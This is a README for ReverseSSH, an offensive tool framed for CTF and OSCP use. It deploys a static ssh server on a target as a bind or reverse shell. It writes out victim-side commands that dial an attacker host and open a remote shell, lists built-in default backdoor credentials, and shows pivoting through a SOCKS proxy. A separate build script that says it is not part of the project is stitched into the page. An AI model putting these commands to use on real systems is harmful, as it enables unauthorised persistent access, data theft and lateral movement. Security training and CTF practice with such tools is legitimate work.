ReverseSSH - a statically-linked ssh server with reverse shell functionality for CTFs and such


ReverseSSH

A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar.

It was developed and extensively used during OSCP exam preparation.


Features

Catching a reverse shell with netcat is cool, sure, but who hasn't accidentally closed one with a keyboard interrupt due to muscle memory? Besides being fragile, such shells often lack convenience features such as fully interactive access, TAB-completion or history.

Instead, you can simply deploy a lightweight ssh server (<1.5MB) onto the target and use additional commodities such as file transfer and port forwarding!

ReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation. Its main strengths are the following:

  • Fully interactive shell access (see Windows caveats below)
  • File transfer via sftp
  • Local / remote / dynamic port forwarding
  • Supports Unix and Windows operating systems

Windows caveats

A fully interactive PowerShell on Windows relies on the Windows Pseudo Console (ConPTY) and thus requires at least Win10 Build 17763. On earlier versions it still works, but you only get a somewhat interactive, generic reverse shell.

You can still improve it for older Windows versions by dropping ssh-shellhost.exe from OpenSSH for Windows into the same directory as reverse-ssh and then using the flag -s ssh-shellhost.exe. This pipes all traffic through ssh-shellhost.exe, which mimics a pty and transforms all virtual terminal codes into a form Windows can understand.

Requirements

Running the provided binaries relies only on Go's own system requirements.

In short:

  • Linux: kernel version 2.6.23 and higher
  • Windows: Windows Server 2008R2 and higher or Windows 7 and higher

Compiling additionally requires the following:

  • golang version 1.15
  • optionally upx for compression (e.g. apt install upx-ucl)

Usage

reverseSSH v1.0.0-alpha  Copyright (C) 2021  Ferdinor <[email protected]>

Usage: reverse-ssh [options] [<user>@]<target>

Examples:
  Bind:
        reverse-ssh
        reverse-ssh -v -l :4444
  Reverse:
        reverse-ssh 192.168.0.1
        reverse-ssh [email protected]
        reverse-ssh -p 31337 192.168.0.1
        reverse-ssh -v -b 0 [email protected]

Options:
        -s, Shell to use for incoming connections, e.g. /bin/bash; (default: /bin/bash)
                for windows this can only be used to give a path to 'ssh-shellhost.exe' to
                enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)
        -l, Bind scenario only: listen at this address:port (default: :31337)
        -p, Reverse scenario only: ssh port at home (default: 22)
        -b, Reverse scenario only: bind to this port after dialling home (default: 8888)
        -v, Emit log output

<target>
        Optional target which enables the reverse scenario. Can be prepended with
        <user>@ to authenticate as a different user than 'reverse' while dialling home.

Credentials:
        Accepting all incoming connections from any user with either of the following:
         * Password "letmeinbrudipls"
         * PubKey   "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi"

Once reverse-ssh is running, you can connect with any username and the default password letmeinbrudipls, the ssh key or whatever you specified during compilation. After all, it is just an ssh server:

# Simple, interactive shell access
$ ssh -p <RPORT> <RHOST>

# Full-fledged file transfers
$ sftp -P <RPORT> <RHOST>

# Dynamic port forwarding as SOCKS proxy
$ ssh -p <RPORT> -D 9050 <RHOST>

For even more convenience, add the following to your ~/.ssh/config, copy the ssh private key to ~/.ssh/ and simply call ssh target or sftp target afterwards:

Host target
        Hostname 127.0.0.1
        Port 8888
        IdentityFile ~/.ssh/id_reverse-ssh
        IdentitiesOnly yes
        StrictHostKeyChecking no
        UserKnownHostsFile /dev/null

Simple bind shell scenario

# Victim
$ ./reverse-ssh

# Attacker (default password: letmeinbrudipls)
$ ssh -p 31337 <LHOST>

Simple reverse shell scenario

# On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
attacker$ ./reverse-ssh -l :<LPORT>

# On victim
victim$ ./reverse-ssh -p <LPORT> <LHOST>
# or in case of an ssh daemon listening at port 22 with user/pass authentication
victim$ ./reverse-ssh <USER>@<LHOST>

# On attacker (default password: letmeinbrudipls)
attacker$ ssh -p 8888 127.0.0.1
# or with ssh config from above
attacker$ ssh target

In the end it's plain ssh, so you could also catch the remote port forwarding request coming from the victim's machine with your OpenSSH daemon listening on port 22. Just prepend <USER>@ and provide the password once asked to do so. Dialling home currently is password only, because I didn't feel like baking a private key in there as well yet...

Build instructions

Make sure to install the above requirements such as golang in a matching version and set it up correctly. Afterwards, you can compile with make, which will create static binaries in bin. Use make compressed to pack the binaries with upx to further reduce their size.

$ make

# or to additionally create binaries packed with upx
$ make compressed

You can also specify a different default shell (RS_SHELL), a personalized password (RS_PASS) or an authorized key (RS_PUB) when compiling:

$ ssh-keygen -t ed25519 -f id_reverse-ssh

$ RS_SHELL="/bin/sh" RS_PASS="secret" RS_PUB="$(cat id_reverse-ssh.pub)" make compressed
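The build-time customization above and the ssh config stanza from the usage section, combined into one script. This is an added example, not part of the reverse-ssh project: it assumes the Makefile honours RS_SHELL, RS_PASS and RS_PUB as described, and the output file names, the KEYFILE variable and the "target" alias are assumptions. The point is that the default password and public key are printed in the usage text, so a binary built with them can be used by anyone who finds it on the target; baking in per-engagement credentials closes that.

```shell
#!/bin/sh
# Added example, not part of the reverse-ssh project: build reverse-ssh with
# per-engagement credentials instead of the published defaults and emit the
# matching ssh_config stanza. Assumes the Makefile honours RS_SHELL, RS_PASS
# and RS_PUB as the README describes; file names and the alias are assumptions.
set -eu

# 128-bit random hex password, so the shipped binary does not accept the
# publicly known default "letmeinbrudipls" (anyone who finds it could log in).
gen_password() {
    od -An -tx1 -N 16 /dev/urandom | tr -d ' \n'
}

# Write the reverse-scenario ssh_config stanza (victim forwarded to local 8888).
# $1 = output file, $2 = host alias, $3 = path to the private key
write_ssh_config() {
    cat >"$1" <<EOF
Host $2
        Hostname 127.0.0.1
        Port 8888
        IdentityFile $3
        IdentitiesOnly yes
        StrictHostKeyChecking no
        UserKnownHostsFile /dev/null
EOF
}

# Compose the build invocation as a single reviewable line.
# $1 = password, $2 = public key line (contents of id_reverse-ssh.pub)
build_command() {
    printf "RS_SHELL='/bin/sh' RS_PASS='%s' RS_PUB='%s' make compressed\n" "$1" "$2"
}

# Full procedure: key, password, config stanza, then the build.
main() {
    key="${KEYFILE:-id_reverse-ssh}"                   # assumed file name
    [ -f "$key" ] || ssh-keygen -t ed25519 -N '' -f "$key"
    pass="$(gen_password)"
    # The README says to copy the private key to ~/.ssh/, so point there.
    write_ssh_config reverse-ssh.sshconfig target "$HOME/.ssh/$key"
    printf 'password: %s\n' "$pass" >reverse-ssh.pass
    chmod 600 reverse-ssh.pass reverse-ssh.sshconfig
    cmd="$(build_command "$pass" "$(cat "$key.pub")")"
    printf '%s\n' "$cmd"
    sh -c "$cmd"
}

# Only run the build when invoked as: sh build-reverse-ssh.sh build
if [ "${1:-}" = build ]; then main; fi
```

Append the generated stanza to ~/.ssh/config (or include it from there) and keep reverse-ssh.pass with the engagement notes, since the password is not recoverable from the binary by normal means.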

Contribute

Is a mind-blowing feature missing? Anything not working as intended?

Create an issue or pull request!
